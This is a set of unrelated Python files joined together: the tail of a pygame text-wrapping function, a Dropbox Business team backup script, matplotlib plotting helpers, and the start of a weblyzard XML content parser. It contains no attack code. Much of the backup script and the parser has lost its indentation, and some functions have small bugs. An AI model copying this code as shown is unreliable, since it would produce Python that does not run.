for attribute in attributes:
if attribute in self.__dict__:
values.append(getattr(self, attribute))
else:
values.append(getattr(self, '_' + attribute))
return '{}: \n{}\n'.format(
self.__class__.__name__, '\n'.join('\t{} = {!r}'.format(name, value) for name, value in zip(attributes, values))
)
def wrap_text(text, size, font_name, font_color, bg_color, anchor='center', font_size=256):
    """Find the largest font size at which `text` (word-wrapped) fits inside
    `size` and return (font_size, rendered_surface).
    Standalone version of get_text_surface_and_font_size above; the extra
    parameters replace the widget attributes that the method reads from self.
    """
    text_array = [line.split() for line in text.splitlines()]
    rows = len(text_array)
    appendable_rows = []
    width, height = size
    lower, upper = 0, font_size
    found = False
    while not found:
        font = pygame.font.SysFont(font_name, font_size)
        font_sizes = tuple(font.size(' '.join(row)) for row in text_array)  # Font size (width, height) of each row.
        text_width = max(row_size[0] for row_size in font_sizes)
        text_height = font_sizes[0][1] * rows
        # The surface cannot fit an exact font size so we'll return the lower of the two.
        if upper - lower <= 1:
            found = True
        # Width exceeded, but height will fit one extra row.
        elif text_width > width and text_height + text_height // rows <= height:
            for row, row_size in enumerate(font_sizes):
                if row_size[0] == text_width:
                    if len(text_array[row]) > 1:
                        if row + 1 in appendable_rows:
                            word = text_array[row].pop()
                            text_array[row + 1].insert(0, word)
                        else:
                            word = text_array[row].pop()
                            text_array.insert(row + 1, [word])
                            appendable_rows.append(row + 1)
                            rows += 1
                    else:
                        upper = font_size
                        font_size = (lower + upper) // 2
                    break
        elif text_width > width or text_height > height:
            upper = font_size
            font_size = (lower + upper) // 2
        elif text_width < width and text_height < height:
            lower = font_size
            font_size = (lower + upper) // 2
        else:
            found = True
    return_surface = pygame.Surface(size)
    return_surface.fill(bg_color)
    h = height // rows
    for row, text_row in enumerate(text_array):
        sub_surface = pygame.font.SysFont(font_name, lower).render(' '.join(text_row), 1, font_color)
        rect = pygame.Rect(0, h * row, width, h)
        pos = sub_surface.get_rect()
        setattr(pos, anchor, getattr(rect, anchor))
        return_surface.blit(sub_surface, pos)
    return lower, return_surface
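# Minimal usage sketch for wrap_text (assumes the standalone signature above;
# 'arial' is an illustrative font name and falls back to pygame's default font
# if it is not installed).
def _wrap_text_example():
    pygame.font.init()
    best_size, surface = wrap_text('Hello wrapped world', (300, 200), 'arial',
                                   pygame.Color('white'), pygame.Color('black'))
    return best_size, surface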
|
|
"""Backup Dropbox Business files.
See README.md for full instructions.
"""
import argparse
from datetime import date, datetime
from concurrent.futures import ThreadPoolExecutor
from functools import partial
import json
import logging
import logging.config
import os
import re
import string
import sys
import time
from typing import Callable, Generic, Iterator, Set, TypeVar
import queue
import dropbox # type: ignore
__version__ = '2.1.8'
DOWNLOAD_THREADS = 8
MAX_QUEUE_SIZE = 100_000
# Characters that are illegal in Windows paths.
# See https://msdn.microsoft.com/en-us/library/aa365247
ILLEGAL_PATH_CHARS = r'<>:"|?*'
ILLEGAL_PATH_PATTERN = re.compile(f'[{re.escape(ILLEGAL_PATH_CHARS)}]')
# Type for mypy generics
T = TypeVar('T')
class SetQueue(queue.Queue, Generic[T]):
"""Queue which will allow a given object to be put once only.
    Objects are considered identical if their hashes are identical.
"""
def __init__(self, maxsize: int = 0) -> None:
"""Initialise queue with maximum number of items.
0 for infinite queue
"""
super().__init__(maxsize)
self.all_items: Set[T] = set()
def _put(self, item: T) -> None:
# Allow multiple Nones to be queued to act as sentinels
if item not in self.all_items or item is None:
super()._put(item)
self.all_items.add(item)
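# Minimal sketch of SetQueue's put-once behaviour (illustrative only; not used
# by the backup itself): identical hashable items are queued a single time,
# while None sentinels can always be queued again.
def _setqueue_example() -> int:
    q = SetQueue(maxsize=10)
    for item in ('a', 'a', 'b', None, None):
        q.put(item)
    return q.qsize()  # 4: 'a' once, 'b' once, and both None sentinels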
class File:
"""File on Dropbox.
Class required to make files hashable and track the owning member.
"""
def __init__(self, file: dropbox.files.Metadata,
member: dropbox.team.TeamMemberProfile) -> None:
self.file = file
self.member = member
def __hash__(self) -> int:
"""Make File hashable for use in sets."""
return hash(self.file.id)
def __eq__(self, other: object) -> bool:
"""Must implement __eq__ if we implement __hash__."""
if isinstance(other, File):
return self.file.id == other.file.id
return NotImplemented
def __repr__(self):
return self.file.path_display
def parse_args() -> argparse.Namespace:
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--version', action='version',
version=f'%(prog)s {__version__}')
msg = 'select only files modified since date in YYYY-MM-DD format'
parser.add_argument('--since', help=msg)
msg = 'select only files up to size in MB inclusive'
parser.add_argument('--maxsize', type=int, help=msg)
msg = 'path of output directory. Default is "yyyy-mm-dd backup".'
parser.add_argument('--out', help=msg)
msg = ('Dropbox Business access token. The environment variable '
'DROPBOX_TEAM_TOKEN is used if token is not supplied.')
parser.add_argument('--token', help=msg)
args = parser.parse_args()
# Create an output directory name if one was not given
if not args.out:
args.out = date.today().strftime('%Y-%m-%d') + ' backup'
# If since was specified, append it to the output directory name
if args.since:
args.out = ' '.join((args.out, 'since', args.since))
# Convert since to a datetime object
if args.since:
args.since = datetime.strptime(args.since, '%Y-%m-%d')
if args.since > datetime.now():
msg = '"Since" date must not be later than today.'
parser.error(msg)
if not args.token:
try:
args.token = os.environ['DROPBOX_TEAM_TOKEN']
except KeyError:
parser.error('Dropbox Team token required')
return args
def setup_logging() -> None:
DEFAULT_LOGGING = {
"version": 1,
"formatters": {
"standard": {
"format": "%(asctime)s %(levelname)-8s %(name)s: %(message)s"
},
"brief": {
"format": "%(asctime)s %(levelname)-8s %(message)s",
"datefmt": "%H:%M:%S"
}
},
"handlers": {
"console": {
"formatter": "brief",
"class": "logging.StreamHandler"
},
"file": {
"formatter": "standard",
"class": "logging.handlers.RotatingFileHandler",
"filename": "backup.log",
"maxBytes": 10_000_000,
"backupCount": 20,
"encoding": "utf-8"
}
},
"loggers": {
# Prevent numerous INFO messages from the dropbox package
"dropbox": {
"level": "WARNING"
}
},
"root": {
"level": "INFO",
"handlers": ["console", "file"]
}
}
try:
with open('logging_config.json') as f:
logging.config.dictConfig(json.load(f))
except FileNotFoundError:
logging.config.dictConfig(DEFAULT_LOGGING)
def get_members(team: dropbox.dropbox.DropboxTeam) \
-> Iterator[dropbox.team.TeamMemberProfile]:
"""Generate Dropbox Businesss members."""
members_list = team.team_members_list()
for member in members_list.members:
yield member
while members_list.has_more:
members_list = team.team_members_list_continue(members_list.cursor)
for member in members_list.members:
yield member
def enqueue(member: dropbox.team.TeamMemberProfile, q: queue.Queue,
getter: Callable[[dropbox.team.TeamMemberInfo], Iterator[File]],
predicate: Callable[[dropbox.files.Metadata], bool]) -> None:
"""Enqueue files for member if predicate(file) is True."""
for f in getter(member):
if predicate(f):
q.put(f)
def dequeue(q: queue.Queue, download: Callable[[File], None]) -> None:
"""Call download on each item in queue until q.get() returns None."""
logger = logging.getLogger('backup.dequeue')
while True:
file = q.get()
if file is None:
logger.info(f'Poison pill found with {q.qsize()} left in queue')
break
member_name = file.member.profile.name.display_name
msg = f'{q.qsize()} left in queue. Downloading {file} as {member_name}'
logger.info(msg)
download(file)
def get_files(member: dropbox.team.TeamMemberInfo,
team: dropbox.DropboxTeam) -> Iterator[File]:
"""Generate files for the given member."""
logger = logging.getLogger('backup.get_files')
display_name = member.profile.name.display_name
logger.info(f'Listing files for {display_name}')
user = team.as_user(member.profile.team_member_id)
folder_list = user.files_list_folder('', True)
for entry in folder_list.entries:
logger.debug(f'Found {entry.path_display}')
yield File(entry, member)
while folder_list.has_more:
folder_list = user.files_list_folder_continue(folder_list.cursor)
for entry in folder_list.entries:
logger.debug(f'Found {entry.path_display}')
yield File(entry, member)
logger.info(f'No more files for {display_name}')
def should_download(file: File, args: argparse.Namespace) -> bool:
"""Return the True if file passes the filters specified in args."""
logger = logging.getLogger('backup.should_download')
# Do not download folders
if isinstance(file.file, dropbox.files.FolderMetadata):
return False
try:
# Ignore large files
if args.maxsize is not None and file.file.size > 1e6 * args.maxsize:
logger.debug(f'Too large: {file}')
return False
# Ignore files modified before given date
if args.since is not None and args.since > file.file.server_modified:
logger.debug(f'Too old: {file}')
return False
except AttributeError:
# Not a file. Don't mark to download
logger.error(f'Does not have file attributes: {file}')
return False
# Return all other files
logger.debug(f'OK: {file}')
return True
def remove_unprintable(text: str) -> str:
"""Remove unprintable unicode characters."""
return ''.join(c for c in text if c in string.printable)
def remove_illegal(path: str) -> str:
"""Remove illegal characters."""
return re.sub(ILLEGAL_PATH_PATTERN, '', path)
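# Illustrative sketch (hypothetical path, not from a real account): strip the
# non-printable characters first, then the Windows-illegal ones, exactly as
# download() does below.
def _sanitise_path_example() -> str:
    raw = '/Team Folder/re\u200bport: "Q1"?.xlsx'
    return remove_illegal(remove_unprintable(raw))  # '/Team Folder/report Q1.xlsx'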
def download(file: File, team: dropbox.dropbox.DropboxTeam,
root: str) -> None:
"""Save the file under the root directory given."""
logger = logging.getLogger('backup.download')
path = remove_illegal(remove_unprintable(file.file.path_display))
# Remove the leading slash from printable_path
local_path = os.path.join(root, path[1:])
member_name = file.member.profile.name.display_name
logger.debug(f'Saving {local_path} as {member_name}')
# Create output directory if it does not exist
try:
os.makedirs(os.path.dirname(local_path), exist_ok=True)
user = team.as_user(file.member.profile.team_member_id)
user.files_download_to_file(local_path, file.file.path_display)
except FileNotFoundError:
# FileNotFoundError raised if path is too long
# If this occurs, see https://bugs.python.org/issue27731
logger.exception('Path might be too long')
except dropbox.exceptions.ApiError as ex:
if ex.user_message_text:
logger.error('API error message: ' + ex.user_message_text)
else:
fmt = '{} for {} as {}'
logger.error(fmt.format(ex.error, file.file.path_display,
file.member.profile.name.display_name))
except Exception:
msgs = [f'Exception whilst saving {local_path}',
f'Dropbox path is {file.file.path_display}',
f'File ID is {file.file.id}',
f'User is {file.member.profile.name.display_name}',
f'User ID is {file.member.profile.team_member_id}']
logger.exception(os.linesep.join(msgs))
def list_and_save(args: argparse.Namespace) -> None:
"""List and save Dropbox files (main program)."""
logger = logging.getLogger('backup.list_and_save')
logger.info(f'{__file__} version {__version__}')
team = dropbox.DropboxTeam(args.token)
    # Synchronised queue of File objects to download
file_queue = SetQueue[File](MAX_QUEUE_SIZE)
# Create partial functions to save invariant arguments
_get_files = partial(get_files, team=team)
_should_download = partial(should_download, args=args)
_downloader = partial(download, team=team, root=args.out)
with ThreadPoolExecutor(DOWNLOAD_THREADS) as consumer_exec:
# Start the threads to download files
for _ in range(DOWNLOAD_THREADS):
consumer_exec.submit(dequeue, file_queue, _downloader)
# Start the threads to get file names
with ThreadPoolExecutor() as producer_exec:
for member in get_members(team):
producer_exec.submit(enqueue, member, file_queue, _get_files,
_should_download)
# Tell the threads we're done
logger.debug('Shutting down the consumer threads')
for _ in range(DOWNLOAD_THREADS):
file_queue.put(None)
def main() -> int:
setup_logging()
logger = logging.getLogger('backup.main')
# Parse command line arguments
args = parse_args()
try:
start = time.time()
list_and_save(args)
logger.info(f'Exit OK at {time.time() - start:.2f} s')
return 0
    # Log SystemExit exceptions (e.g. from sys.exit()) before returning
except SystemExit:
logger.info(f'SystemExit raised at {time.time() - start:.2f} s')
return 1
# Report all other exceptions
except Exception:
logger.exception(f'Uncaught exception at {time.time() - start:.2f} s')
return -1
if __name__ == '__main__':
sys.exit(main())
|
|
###############################################################################
# drawtools.py
# Some drawing tools.
###############################################################################
import sys
import numpy as np
import numpy.linalg as linalg
import scipy as sp
import scipy.constants
import scipy.interpolate as spinterpolate
import matplotlib as mplot
import matplotlib.pyplot as plt
import matplotlib.animation as anim
from matplotlib.patches import FancyArrowPatch
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d import proj3d
from matplotlib.backends.backend_pdf import PdfPages
def plot_2d_func(fun, xvals=None, yvals=None, type="contour", **kwargs):
fig = plt.gcf()
if xvals is None:
xvals = np.arange(-5, 5, 0.5)
if yvals is None:
yvals = np.arange(-5, 5, 0.5)
X, Y = np.meshgrid(xvals, yvals)
    zs = np.array([fun(np.array([xv, yv])) for xv, yv in zip(np.ravel(X), np.ravel(Y))])
Z = zs.reshape(X.shape)
if type == "surf":
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(X, Y, Z, **kwargs)
elif type == "contour":
plt.contour(X, Y, Z, **kwargs)
else:
raise NotImplementedError("Don't know about plot type '%s'..." % type)
return fig
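# Minimal usage sketch (illustrative): contour plot of a quadratic bowl. The
# callable receives a length-2 array, matching how plot_2d_func evaluates it.
def _plot_2d_func_example():
    fig = plot_2d_func(lambda p: p[0] ** 2 + p[1] ** 2, type="contour")
    return fig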
def irreg_contour(x, y, z, xi, yi, **kwargs):
zi = spinterpolate.griddata((x, y), z, (xi[None,:], yi[:,None]), method='cubic')
    plt.contour(xi, yi, zi, 15, **kwargs)
class Arrow3D(FancyArrowPatch):
def __init__(self, xs, ys, zs, *args, **kwargs):
FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)
self._verts3d = xs, ys, zs
@classmethod
def from_vector(cls, v, *args, **kwargs):
return cls([0, v[0]], [0, v[1]], [0, v[2]], *args, **kwargs)
@classmethod
def from_vectors(cls, vecs, *args, **kwargs):
l = []
for v in vecs:
l.append(cls([0, v[0]], [0, v[1]], [0, v[2]], *args, **kwargs))
return l
def draw(self, renderer):
xs3d, ys3d, zs3d = self._verts3d
xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)
self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))
FancyArrowPatch.draw(self, renderer)
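# Minimal usage sketch (illustrative): draw a single vector as a 3D arrow.
# The FancyArrowPatch keyword arguments shown are standard matplotlib options.
def _arrow3d_example():
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    arrow = Arrow3D.from_vector([1.0, 2.0, 3.0], mutation_scale=20,
                                arrowstyle='-|>', color='k')
    ax.add_artist(arrow)
    return ax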
def equalise_axes(*figlist):
axis_lims = []
ax = []
for fig in figlist:
ax.append(fig.gca())
axis_lims.append(ax[-1].axis())
axis_lims = np.array(axis_lims).T
new_axis = (np.min(axis_lims[0]),
np.max(axis_lims[1]),
np.min(axis_lims[2]),
np.max(axis_lims[3]))
for a in ax:
a.axis(new_axis)
def figs_to_pdf(path, figlist):
pdf = PdfPages(path)
for f in figlist:
pdf.savefig(f)
pdf.close()
def anim_3dfunc(X0, X1, Y, interval=50):
"""
anim_3dfunc
    Create an animated 3D scatter plot of the points. Each *column* of X0, X1
    and Y is a different time instance.
"""
def get_num(V, num):
if V.ndim == 1:
v = V
else:
v = V[:, num]
return v
def update_histu(num, X0, X1, Y, line):
x0 = get_num(X0, num)
x1 = get_num(X1, num)
y = get_num(Y, num)
line[0].set_data(x0, x1)
line[0].set_3d_properties(y)
sys.stdout.write('%i \r' % num)
return line
def clear_histU():
ls[0].set_data([], [])
ls[0].set_3d_properties([])
return ls
# def clear_histU():
# pass
maxnum = 1
for d in (X0, X1, Y):
try:
maxnum = max(maxnum, d.shape[1])
        except (IndexError, AttributeError):
            pass
    print(maxnum)
figU = plt.figure()
ax = figU.add_subplot(111, projection='3d')
ax.set_xlim(np.min(X0), np.max(X0))
ax.set_ylim(np.min(X1), np.max(X1))
ax.set_zlim3d(np.min(Y), np.max(Y))
ls = ax.plot(get_num(X0, 0), get_num(X1, 0), get_num(Y, 0), 'x')
histU_anim = anim.FuncAnimation(figU, update_histu, maxnum, fargs=(X0, X1, Y, ls), interval=interval, blit=False, init_func=clear_histU)
plt.show()
return ax
def line_sets_2d(set1, set2):
'''
line_sets_2d
Draw lines between points in two sets (2D).
'''
plt.plot(np.vstack((set1.T[0, :], set2.T[0, :])), np.vstack((set1.T[1, :], set2.T[1, :])))
def line_sets_3d(ax, set1, set2, opt='r'):
'''
line_sets_3d
Draw lines between points in two sets (3D).
'''
# ax.plot3D(np.vstack((set1.T[0, :], set2.T[0, :])),
# np.vstack((set1.T[1, :], set2.T[1, :])),
# np.vstack((set1.T[2, :], set2.T[2, :])), 'x')
for s1, s2 in zip(set1, set2):
plt.plot([s1[0], s2[0]],
[s1[1], s2[1]],
[s1[2], s2[2]], opt)
def auto_axes_robust(ax, datax, datay, prop=0.95, verbose=False):
'''
auto_axes_robust
Automatically adjust the axes of a plot, but be robust to outliers. Make
sure that at most the proportion of the data given by 'prop' is actually
displayed.
'''
if type(datax) is list:
datax = np.array(datax)
if type(datay) is list:
datay = np.array(datay)
def _find_robust_range(data, prop=0.95):
'''
_find_robust_range
Required function by auto_axes_robust.
'''
numpoints = np.prod(data.shape)
threshold = prop * numpoints
r = max([np.abs(np.max(data)), np.abs(np.min(data))])
while(np.sum(np.abs(data) < r) > threshold):
r *= 0.9
return r, np.sum(np.abs(data) < r) / numpoints
    fx = 1.0
    if datax is not None:
        rx, fx = _find_robust_range(datax, prop)
        ax.set_xlim(-rx, rx)
    ry, fy = _find_robust_range(datay, prop)
    ax.set_ylim(-ry, ry)
    if verbose:
        print('At least %f of the data is displayed.' % (fx * fy))
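# Minimal usage sketch (illustrative): clip the view to roughly 95% of some
# heavy-tailed data so a few outliers do not dominate the axis limits.
def _auto_axes_robust_example():
    data = np.random.standard_cauchy((2, 1000))
    ax = plt.gca()
    ax.plot(data[0], data[1], 'x')
    auto_axes_robust(ax, data[0], data[1], prop=0.95)
    return ax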
def GenEllipsoid(A, c=[0,0,0], divs=100):
"""
    Calculate the mesh for an ellipsoid. Points satisfy (x-c)'A(x-c) = 1. In
    other words, A is the *precision* matrix when plotting a Gaussian.
    Args:
        A: 3x3 matrix describing the ellipsoid.
        c: Centre of the ellipsoid.
        divs: Number of grid points along each angular coordinate.
    Returns:
        (x, y, z): Tuple of divs x divs grids containing the x, y and z
        coordinates of the points on the mesh.
"""
# find the rotation matrix and radii of the axes
_, s, rotation = linalg.svd(A)
radii = 1.0/np.sqrt(s)
# now carry on with EOL's answer
u = np.linspace(0.0, 2.0 * np.pi, divs)
v = np.linspace(0.0, np.pi, divs)
x = radii[0] * np.outer(np.cos(u), np.sin(v))
y = radii[1] * np.outer(np.sin(u), np.sin(v))
z = radii[2] * np.outer(np.ones_like(u), np.cos(v))
for i in range(len(x)):
for j in range(len(x)):
[x[i,j],y[i,j],z[i,j]] = np.dot([x[i,j],y[i,j],z[i,j]], rotation) + c
return (x, y, z)
def CalcEllipse(A, c=[0,0], scale=1.0):
B = linalg.inv(A)
a = B[0, 0]
b = B[0, 1]
c = B[1, 1]
cb2a = c - b**2.0/a
start = (2 / cb2a)**0.5
y = np.linspace(-start, start, 1000)
x = (2/a-cb2a*y**2.0/a)**0.5 + b/a*y
return x, -y
def DrawCovarianceContour(A, c=[0,0], scale=2.0, ax=None, *args, **kwargs):
"""
Draw an ellipse for a Gaussian with *covariance* matrix A.
Args:
A: 2x2 matrix describing the ellipse.
c: Centre of the ellipse.
"""
if ax is None:
ax = plt.gca()
if "color" not in kwargs:
kwargs["color"] = 'b'
x, y = CalcEllipse(A, c, scale)
ax.plot(x*scale, y*scale, *args, **kwargs)
ax.plot(-x*scale, -y*scale, *args, **kwargs)
def DrawCovarianceEllipse(A, c=[0, 0, 0], ax=None, scale=1.0, **kwargs):
"""
DrawCovarianceEllipse
A is *covariance* matrix.
"""
x, y, z = GenEllipsoid(linalg.inv(A), c)
x *= scale
y *= scale
z *= scale
if ax is None:
fig = plt.gcf()
ax = fig.add_subplot(111, projection='3d')
if 'rstride' not in kwargs:
kwargs['rstride'] = 8
if 'cstride' not in kwargs:
kwargs['cstride'] = 8
if 'alpha' not in kwargs:
kwargs['alpha'] = 0.2
wframe = ax.plot_wireframe(x, y, z, **kwargs)
return ax, wframe
def plot_3d_points(P, ax=None, marker='x'):
if ax is None:
fig = plt.gcf()
ax = fig.add_subplot(111, projection='3d')
ax.plot(P[:, 0], P[:, 1], P[:, 2], marker)
return ax
if __name__ == "__main__":
import numpy.random as rnd
A = rnd.randn(2, 2)
A = A.dot(A.T)
d = rnd.multivariate_normal(np.zeros(2), A, 1000)
fig = plt.figure(1)
plt.clf()
plt.plot(d[:, 0], d[:, 1], 'x')
ax = plt.gca()
    DrawCovarianceContour(A, ax=ax)
A = np.array([[1,0,0],[0,8,0],[0,0,1]])
center = [0,0,0]
x, y, z = GenEllipsoid(A, center)
plt.show()
plt.ion()
fig = plt.figure(2)
ax = fig.add_subplot(111, projection='3d')
wframe = ax.plot_wireframe(x, y, z, rstride=4, cstride=4, color='b', alpha=0.2)
ax.axis([-5, 5, -5, 5])
ax.set_zlim3d(-5, 5)
A = np.array([[1., 0., 0.],[0., 1., 0.], [0., 0., 1.]])
for _ in range(50):
if wframe is not None:
ax.collections.remove(wframe)
x, y, z = GenEllipsoid(A, divs=20)
wframe = ax.plot_wireframe(x, y, z)
ax.axis([-2, 2, -2, 2])
ax.set_zlim3d(-2, 2)
plt.draw()
A[1, 1] = A[1,1] * 0.9
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Created on Feb 27, 2013
.. codeauthor: Heinz-Peter Lang <[email protected]>
.. codeauthor: Albert Weichselbraun <[email protected]>
.. codeauthor: Fabian Fischer <[email protected]>
Handles the new (http://www.weblyzard.com/wl/2013#) weblyzard
XML format.
Functions added:
- support for sentence tokens and pos iterators
Functions removed:
- compatibility fixes for namespaces, encodings etc.
- support for the old POS tags mapping.
'''
from __future__ import unicode_literals
from builtins import str
from builtins import object
import json
from weblyzard_api.model.parsers.xml_deprecated import XMLDeprecated
from weblyzard_api.model.parsers.xml_2005 import XML2005
from weblyzard_api.model.parsers.xml_2013 import XML2013
from weblyzard_api.model.parsers import EmptySentenceException
from weblyzard_api.model import Sentence, Annotation
SENTENCE_ATTRIBUTES = ('pos_tags', 'sem_orient', 'significance', 'md5sum',
'pos', 'token', 'dependency')
class XMLContent(object):
SUPPORTED_XML_VERSIONS = {XML2005.VERSION: XML2005,
XML2013.VERSION: XML2013,
XMLDeprecated.VERSION: XMLDeprecated}
API_MAPPINGS = {
1.0: {
'language_id': 'language_id',
'lang': 'language_id',
'xml:lang': 'language_id',
'title': 'title',
'uri': 'uri'
}
}
ATTRIBUTE_MAPPING = {'uri': 'uri',
'content_id': 'id',
'title': 'title',
'sentences': 'sentences',
'body_annotations': 'annotations',
'lang': 'xml:lang',
'language_id': 'xml:lang',
'sentences_map': {'pos': 'pos',
'token': 'token',
'value': 'value',
'md5sum': 'id'},
'annotations_map': {'start': 'start',
'end': 'end',
'key': 'key',
'surfaceForm': 'surfaceForm'
}}
def __init__(self, xml_content, remove_duplicates=True):
self.xml_version = None
self.attributes = {}
self.sentence_objects = []
self.titles = []
self.remove_duplicates = remove_duplicates
self.body_annotations = []
self.title_annotations = []
self.features = {}
self.relations = {}
result = self.parse_xml_content(xml_content, remove_duplicates)
if result:
self.xml_version, self.attributes, self.sentence_objects, \
self.title_annotations, self.body_annotations, self.titles, \
self.features, self.relations = result
pass
@classmethod
def convert(cls, xml_content, target_version):
xml = XMLContent(xml_content)
return xml.get_xml_document(xml_version=target_version)
@classmethod
def parse_xml_content(cls, xml_content, remove_duplicates=True):
xml_version = cls.get_xml_version(xml_content)
if not xml_version or not xml_content:
return None
sentence_objects = []
annotation_objects = []
parser = cls.SUPPORTED_XML_VERSIONS[xml_version]
try:
attributes, sentences, title_annotations, body_annotations, features, \
relations = parser.parse(xml_content, remove_duplicates, raise_on_empty=True)
except EmptySentenceException as e:
raise EmptySentenceException('Empty sentence object: {}'.format(
xml_content
))
titles = []
for sentence in sentences:
try:
sent_obj = Sentence(**sentence)
            except Exception:
sent_obj = Sentence(**{k:v for k,v in sentence.items() if k in Sentence.API_MAPPINGS[1.0]})
if sent_obj.is_title:
titles.append(sent_obj)
else:
sentence_objects.append(sent_obj)
if len(titles) == 0 and 'title' in attributes:
# fall back titles from attributes
titles = [Sentence(value=attributes['title'], is_title=True)]
for annotation in body_annotations:
annotation_obj = Annotation(**annotation)
annotation_objects.append(annotation_obj)
return xml_version, attributes, sentence_objects, title_annotations, \
annotation_objects, titles, features, relations
@classmethod
def get_xml_version(cls, xml_content):
if not xml_content:
return None
for version, xml_parser in cls.SUPPORTED_XML_VERSIONS.items():
if xml_parser.is_supported(xml_content):
return version
def get_xml_document(self, header_fields='all',
sentence_attributes=SENTENCE_ATTRIBUTES,
annotations=None,
features=None,
relations=None,
ignore_title=False,
xml_version=XML2013.VERSION):
'''
:param header_fields: the header_fields to include
:param sentence_attributes: sentence attributes to include
        :param annotations: optional annotations to include
        :param features: optional features to overwrite the stored ones
        :param relations: optional relations to overwrite the stored ones
        :param ignore_title: if True, title sentences are not serialized
:param xml_version: version of the webLyzard XML format to use (XML2005.VERSION, *XML2013.VERSION*)
:returns: the XML representation of the webLyzard XML object
'''
if not xml_version:
xml_version = self.xml_version
if not hasattr(self, 'features'):
self.features = {}
if features is None:
features = self.features
if not hasattr(self, 'relations'):
self.relations = {}
if relations is None:
relations = self.relations
titles = self.titles
if ignore_title:
titles = []
return self.SUPPORTED_XML_VERSIONS[xml_version].dump_xml(titles=titles,
attributes=self.attributes,
sentences=self.sentences,
annotations=annotations,
features=features,
relations=relations)
def get_plain_text(self, include_title=False):
''' :returns: the plain text of the XML content '''
if not len(self.all_sentences):
return ''
if not include_title:
return '\n'.join([s.value for s in self.all_sentences if not s.is_title])
else:
return '\n'.join([s.value for s in self.all_sentences])
@classmethod
def get_text(cls, text):
        ''' :returns: the text decoded to a unicode string '''
        if isinstance(text, bytes):
            text = text.decode('utf-8')
return text
def add_attribute(self, key, value):
if not self.attributes:
self.attributes = {}
self.attributes[key] = value
def update_attributes(self, new_attributes):
'''
Updates the existing attributes with new ones
:param new_attributes: The new attributes to set.
:type new_attributes: dict
'''
# not using dict.update to allow advanced processing
if not new_attributes or not isinstance(new_attributes, dict):
return
for k, v in new_attributes.items():
self.attributes[str(k)] = v
def update_features(self, new_features):
if not new_features or not isinstance(new_features, dict):
return
for k, v in new_features.items():
self.features[str(k)] = v
def update_relations(self, new_relations):
if not new_relations or not isinstance(new_relations, dict):
return
for k, v in new_relations.items():
self.relations[str(k)] = v
def as_dict(self, mapping=None, ignore_non_sentence=False,
ignore_features=False, ignore_relations=False,
add_titles_to_sentences=False):
''' convert the XML content to a dictionary.
:param mapping: an optional mapping by which to restrict/rename \
the returned dictionary
        :param ignore_non_sentence: if true, sentences without POS tags \
are omitted from the result
:param ignore_features: if true, document features do not get serialized
:param ignore_relations: if true, document relations do not get serialized
:param add_titles_to_sentences: if true, titles are treated as sentences
'''
try:
if mapping is None:
mapping = self.ATTRIBUTE_MAPPING
result = self.apply_dict_mapping(self.attributes, mapping)
sentence_attr_name = mapping['sentences'] if 'sentences' in mapping else 'sentences'
if 'sentences_map' in mapping:
result[sentence_attr_name] = []
sent_mapping = mapping['sentences_map']
if add_titles_to_sentences and len(self.titles):
sentences = self.titles + self.sentences
else:
sentences = self.sentences
for sent in sentences:
if ignore_non_sentence and not sent.pos:
continue
sent_attributes = self.apply_dict_mapping(sent.as_dict(),
sent_mapping)
result[sentence_attr_name].append(sent_attributes)
annotation_attr_name = mapping['body_annotations'] \
if 'body_annotations' in mapping else 'body_annotations'
if 'annotations_map' in mapping:
result[annotation_attr_name] = []
annotation_mapping = mapping['annotations_map']
for annotation in self.body_annotations:
annotation_attributes = self.apply_dict_mapping(annotation.as_dict(),
annotation_mapping)
result[annotation_attr_name].append(annotation_attributes)
if not ignore_features and self.features:
result['features'] = self.features
if not ignore_relations and self.relations:
result['relations'] = self.relations
except Exception as e:
result = self.attributes
result.update({'sentences': [sent.as_dict()
for sent in self.sentences]})
return result
@classmethod
def apply_dict_mapping(cls, attributes, mapping=None):
result = attributes
if mapping:
result = {}
for attr, value in attributes.items():
if attr in mapping:
result[mapping[attr]] = value
return result
def to_api_dict(self, version=1.0):
'''
        Transforms the XMLContent object to a dict analogous to the
API JSON definition in the given version.
:param version: The version to conform to.
:type version: float
:returns: A dict.
:rtype: dict
'''
document_dict = self.as_dict()
api_dict = {}
for key in self.API_MAPPINGS[version]:
if key in document_dict:
api_dict[self.API_MAPPINGS[version][key]] = \
document_dict[key]
if self.sentences and len(self.sentences) > 0:
sentences = [s.to_api_dict(version) for s in self.sentences]
api_dict['sentences'] = sentences
if self.titles and len(self.titles) > 0:
for t in self.titles:
api_dict['sentences'] = [t.to_api_dict(
version)] + api_dict.get('sentences', [])
if 'title' not in api_dict:
api_dict['title'] = t.value
# elif api_dict['title'] != t.value:
# raise Exception('Mismatch between sentence marked as title and '+\
# 'title attribute:\n'+\
# '%s != %s' % (t.value, api_dict['title']))
annotations = document_dict.get('annotations', None)
if annotations:
api_dict['annotations'] = annotations
if self.features and len(self.features) > 0:
api_dict['features'] = self.features
if self.relations and len(self.relations) > 0:
api_dict['relations'] = self.relations
return api_dict
def to_json(self, version=1.0):
'''
Serializes the XMLContent object to JSON according to the
specified version.
:param version: The version to conform to.
:type version: float
:returns: A JSON string.
:rtype: str
'''
return json.dumps(self.to_api_dict(version=version))
def _get_attribute(self, attr_name):
        ''' :returns: the attribute for the given name '''
return self.attributes.get(attr_name, None)
def get_nilsimsa(self):
return self._get_attribute('nilsimsa')
def get_content_type(self):
return self._get_attribute('content_type')
def get_title(self):
return self._get_attribute('title')
def get_lang(self):
if self._get_attribute('language_id') is not None:
return self._get_attribute('language_id')
return self._get_attribute('lang')
def get_content_id(self):
content_id = self._get_attribute('content_id')
return int(content_id) if content_id else content_id
def get_sentences(self, include_title_sentences=False):
        titles = self.titles if include_title_sentences else []
        return titles + self.sentence_objects
def get_all_sentences(self):
return self.get_sentences(include_title_sentences=True)
def update_sentences(self, sentences):
'''
        Updates the values of the existing sentences. If the list of
        sentence objects is empty, sentence_objects is set to the new
        sentences.
:param sentences: list of Sentence objects
.. warning:: this function will not add new sentences
'''
if not self.sentence_objects:
self.sentence_objects = sentences
else:
sentence_dict = dict((sent.md5sum, sent) for sent in sentences)
